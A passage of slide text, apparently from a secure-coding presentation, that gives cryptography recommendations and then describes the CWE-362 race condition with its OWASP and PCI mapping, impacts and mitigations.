• Select a well-vetted algorithm that is currently considered to be strong (e.g.,
FIPS 140-2 (i.e. Triple-DES, AES, RSA) or an equivalent standard)
• Periodically ensure that the cryptography used by the software has not
become obsolete
• Design your software so that you can replace one cryptographic algorithm
with another
• All cryptographic functions used to protect secrets from the application user
must be implemented on a trusted system (e.g., The server)
• Protect master secrets from unauthorized access
58
[25] CWE-362
Concurrent Execution using Shared Resource with Improper Synchronization
('Race Condition')
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: N/A
General Description
• The program contains a code sequence that can run concurrently with
other code, and the code sequence requires temporary, exclusive access
to a shared resource, but a timing window exists in which the shared
resource can be modified by another code sequence that is operating
concurrently
• This can have security implications when the expected synchronization is
in security-critical code, such as recording whether a user is
authenticated or modifying important state information that should not be
influenced by an outsider
59
[25] CWE-362
Concurrent Execution using Shared Resource with Improper Synchronization
('Race Condition')
Potential Impacts
• Unauthorized access to read data
• Denial of service
Common Mitigations
• In languages that support it, use synchronization primitives. Only wrap
these around critical code to minimize the impact on performance
• Minimize the usage of shared resources in order to remove as much
complexity as possible from the control flow and to reduce the likelihood of
unexpected conditions occurring
• When using multithreading and operating on shared variables, only use
thread-safe functions
• Avoid double-checked locking (CWE-609) and other implementation errors
that arise when trying to avoid the overhead of synchronization
60
61
